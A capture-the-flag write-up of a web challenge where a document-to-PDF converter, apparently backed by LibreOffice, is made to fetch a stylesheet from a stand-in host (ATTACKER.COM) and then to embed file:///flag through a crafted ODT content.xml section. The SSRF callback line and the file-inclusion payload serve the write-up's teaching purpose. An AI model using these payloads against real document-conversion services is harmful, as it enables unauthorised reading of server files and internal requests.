Free converter for everyone. You find the flag at : /flag Link: http://126.96.36.199:1920
We are given a black-box web challenge. This application allows us to upload files in various formats (.doc, .jpg, etc.) and converts them into a PDF for us to download.
The first thing that came to mind was whether I can upload arbitrary HTML, since HTML has plenty of potential SSRF / file inclusion vectors. Sure enough, when I uploaded the following HTML file, I got a callback to my server.
<link rel=stylesheet href='http://ATTACKER.COM/exploit.css'>
User-Agentshowed that LibreOffice was making the callback.
OPTIONS /exploit.css HTTP/1.1
Interesting! So LibreOffice is being used to convert the documents. I searched around a bit and came across this writeup on SSRF using LibreOffice documents.
We create a sample LibreOffice word document,
poc.odt. After unzipping the ODT file, we can modify the
content.xmlfile to include our payload. We create a
text:sectiontag that links to the
<?xml version="1.0" encoding="UTF-8"?>
xlink:href="file:///flag" xlink:type="simple" xlink:show="embed"
Then, zipping the files again into a
modified.odtgives us our payload. Uploading this to the server gives us the flag!